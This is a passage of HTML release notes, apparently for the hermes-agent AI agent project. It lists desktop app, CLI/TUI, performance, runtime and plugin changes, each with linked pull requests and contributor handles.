<li>Kanban wakes resume the creator's DM/thread session; kanban/delegate wake-ups reach api_server sessions; per-task model + thinking-depth from the board (<a href="https://github.com/NousResearch/hermes-agent/pull/72191" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72191/hovercard">#72191</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70171" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70171/hovercard">#70171</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69876" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69876/hovercard">#69876</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76417" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76417/hovercard">#76417</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Relay: Discord tool-progress routed into the auto-thread instead of the parent channel (<a href="https://github.com/NousResearch/hermes-agent/pull/77830" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77830/hovercard">#77830</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li>Outbound webhooks — push signed lifecycle events to external endpoints; simplex channel enumeration in <code>hermes send --list</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/69406" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69406/hovercard">#69406</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77110" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77110/hovercard">#77110</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🖥️ Hermes Desktop App</h2>
<h3>The platform wave</h3>
<ul>
<li><strong>Artifacts</strong> — versioned cards, sandboxed live preview, right-rail viewer (<a href="https://github.com/NousResearch/hermes-agent/pull/72345" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72345/hovercard">#72345</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Plugin SDK</strong> — Kanban as the founding desktop plugin; <code>ctx.download</code> hands the user a file; widget-app SDK (apps as state+reducer+render) with three reference apps; widget-grid layout engine + background-aware theme engine (<a href="https://github.com/NousResearch/hermes-agent/pull/61173" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61173/hovercard">#61173</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74413" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74413/hovercard">#74413</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68306" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68306/hovercard">#68306</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/20379" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/20379/hovercard">#20379</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Quick-entry window (global hotkey → any session); multiple GUI windows; floating pane placement; pane toggles anywhere + hidden header; ⌘O open-folder-as-project (<a href="https://github.com/NousResearch/hermes-agent/pull/72315" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72315/hovercard">#72315</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68259" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68259/hovercard">#68259</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73143" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73143/hovercard">#73143</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/75848" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75848/hovercard">#75848</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74623" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74623/hovercard">#74623</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>SSH remote-backend connection mode; event-driven live sync replaces always-on polls; remote profile routing/sessions/pool lifecycle repaired (<a href="https://github.com/NousResearch/hermes-agent/pull/68130" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68130/hovercard">#68130</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73673" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73673/hovercard">#73673</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72835/hovercard">#72835</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yoniebans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yoniebans">@yoniebans</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Let the agent drive the shell (preview pane + pane focus) AND inspect the desktop app it's developing; find-in-page (Ctrl+F); GUI terminal copy/paste + font picker (<a href="https://github.com/NousResearch/hermes-agent/pull/69519" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69519/hovercard">#69519</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73121" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73121/hovercard">#73121</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72235" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72235/hovercard">#72235</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73705" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73705/hovercard">#73705</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76395" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76395/hovercard">#76395</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Composer &amp; UX</h3>
<ul>
<li>Attach files/folders/links via picker; composer chips for @ paths and pasted links; composer undo stack; double-ESC discards draft; double-Enter sends the queued turn; type-to-focus (<a href="https://github.com/NousResearch/hermes-agent/pull/74668" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74668/hovercard">#74668</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73110" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73110/hovercard">#73110</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72201" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72201/hovercard">#72201</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72288" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72288/hovercard">#72288</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74736" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74736/hovercard">#74736</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73101" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73101/hovercard">#73101</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68918" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68918/hovercard">#68918</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>2-keypress model switching (⌘⇧M); YOLO in ⌘K with live toggle state; keyboard-first pickers; keyboard navigation for clarify choices; server-owned pins that follow you between apps (<a href="https://github.com/NousResearch/hermes-agent/pull/74545" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74545/hovercard">#74545</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74674" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74674/hovercard">#74674</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74602" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74602/hovercard">#74602</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69799" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69799/hovercard">#69799</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74234" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74234/hovercard">#74234</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Grouped, live-ticking tool-activity line; improved tool call detail views; @session links resolve to clickable titles; brand icons on known-domain links; iMessage-style emoji reactions (opt-in, two-way); double-click to heart (<a href="https://github.com/NousResearch/hermes-agent/pull/72893" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72893/hovercard">#72893</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69868" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69868/hovercard">#69868</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71162" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71162/hovercard">#71162</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73047" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73047/hovercard">#73047</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74533" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74533/hovercard">#74533</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74644" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74644/hovercard">#74644</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Sidebar date dividers + pinned section + opt-in stale-session auto-archive; sessions stop lying about running state; credit-usage toasts; configurable attachment size limit; Cron Blueprints + Webhooks pages; searchable timezone picker (<a href="https://github.com/NousResearch/hermes-agent/pull/70822" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70822/hovercard">#70822</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72303" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72303/hovercard">#72303</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69828" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69828/hovercard">#69828</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73221" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73221/hovercard">#73221</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70066" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70066/hovercard">#70066</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69687" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69687/hovercard">#69687</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73505" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73505/hovercard">#73505</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adolanium/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adolanium">@Adolanium</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>RFC 8252 native desktop sign-in (system browser + PKCE, no webview cookies); "Connect to existing Hermes" in first-run onboarding; profile-correct pairing approvals with a desktop surface (<a href="https://github.com/NousResearch/hermes-agent/pull/67920" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67920/hovercard">#67920</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70907" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70907/hovercard">#70907</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74446" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74446/hovercard">#74446</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Keep-computer-awake toggle + notch wake indicator; /battery status-bar toggle; UI zoom 90% default preset; status bar hideable (<a href="https://github.com/NousResearch/hermes-agent/pull/68140" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68140/hovercard">#68140</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76396" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76396/hovercard">#76396</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68860" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68860/hovercard">#68860</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73161" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73161/hovercard">#73161</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72960" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72960/hovercard">#72960</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Desktop performance (60fps wave 2)</h3>
<ul>
<li>Streaming cost independent of transcript length; 60fps on real sessions (reflow-gated pins, adaptive flush); drag at 60fps with five streaming tabs; multitab streaming made fast (<a href="https://github.com/NousResearch/hermes-agent/pull/71835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71835/hovercard">#71835</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72504" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72504/hovercard">#72504</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72346" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72346/hovercard">#72346</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71780" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71780/hovercard">#71780</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Hidden-pane timers paused (agents view, cron sidebar, floating pet), scroll/status loops stopped in busy sessions (<a href="https://github.com/NousResearch/hermes-agent/pull/77651" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77651/hovercard">#77651</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>); idle CPU near zero in the background; sidebar/overlay render churn killed; statusbar + transcript stop re-rendering per token/sash-drag/session-switch; ⌘K opens instantly; renderer cold start keeps shiki/mermaid off the boot path (<a href="https://github.com/NousResearch/hermes-agent/pull/75218" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75218/hovercard">#75218</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73698" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73698/hovercard">#73698</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72163" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72163/hovercard">#72163</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72245/hovercard">#72245</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72524" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72524/hovercard">#72524</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74665" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74665/hovercard">#74665</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73024" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73024/hovercard">#73024</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>State diagnostics (render + store churn counters) + a lint rule banning atom-mirrored refs so the stale-read bug class cannot return; Playwright E2E suite with visual regression diffs (<a href="https://github.com/NousResearch/hermes-agent/pull/71925" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71925/hovercard">#71925</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71560" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71560/hovercard">#71560</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65805" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65805/hovercard">#65805</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
</ul>
<h2>🖥️ CLI, TUI &amp; Dashboard</h2>
<ul>
<li><code>!</code> shell mode; <code>/init</code> AGENTS.md generation; <code>/diff</code> (staged/all/session, cross-surface); <code>/context</code> breakdown; <code>/focus</code> reduced-output view; Ctrl+S prompt stash; persistent <code>/goal</code> indicator; multi-select clarify (checkboxes) across CLI/gateway/TUI (<a href="https://github.com/NousResearch/hermes-agent/pull/72257" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72257/hovercard">#72257</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72178" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72178/hovercard">#72178</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72240" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72240/hovercard">#72240</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72242" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72242/hovercard">#72242</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72302" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72302/hovercard">#72302</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72262" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72262/hovercard">#72262</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72244" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72244/hovercard">#72244</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72188" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72188/hovercard">#72188</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, salvaging <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iRonin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iRonin">@iRonin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gigi206/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gigi206">@gigi206</a> + more)</li>
<li><code>hermes import-agent</code> — one-command migration from Claude Code / Codex CLI setups (<a href="https://github.com/NousResearch/hermes-agent/pull/72190" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72190/hovercard">#72190</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Per-turn summary line + live token flow in the spinner; cross-surface theme SDK (one skin themes CLI, TUI, and desktop, live) (<a href="https://github.com/NousResearch/hermes-agent/pull/72246" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72246/hovercard">#72246</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68857" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68857/hovercard">#68857</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>TUI: reach the model picker without wrecking your draft + mid-turn switching; slash menu leads with your most-used skills; attachments live in the composer; Arabic (ar) locale with RTL across desktop/dashboard/agent (<a href="https://github.com/NousResearch/hermes-agent/pull/74756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74756/hovercard">#74756</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/75931" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75931/hovercard">#75931</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/75210" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75210/hovercard">#75210</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70870" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70870/hovercard">#70870</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><code>hermes -w</code> startup ~14s → ~1.8s; global <code>--version</code> fast path; banner update-check 6× faster; dashboard lazy-loads routes + GROUP BY session stats; session filtering tabs (Chats/Automation/All) (<a href="https://github.com/NousResearch/hermes-agent/pull/71637" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71637/hovercard">#71637</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/62096" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62096/hovercard">#62096</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74188" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74188/hovercard">#74188</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72294" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72294/hovercard">#72294</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73362" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73362/hovercard">#73362</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73865" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73865/hovercard">#73865</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Runtime: Node 26 required across installers/heal/upgrade, managed Node/uv resolve before bare PATH, outdated managed trees heal to target major; brew + pip/PyPI wheel channels retired (shell installer / Docker / Nix are the supported channels) (<a href="https://github.com/NousResearch/hermes-agent/pull/76459" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76459/hovercard">#76459</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68217" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68217/hovercard">#68217</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
</ul>
<h2>🧩 Skills, Plugins &amp; MCP</h2>
<ul>
<li><strong>A2A v1.0</strong> — Agent-to-Agent protocol plugin (closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4033216787" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/514" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/514/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/514">#514</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/77109" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77109/hovercard">#77109</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
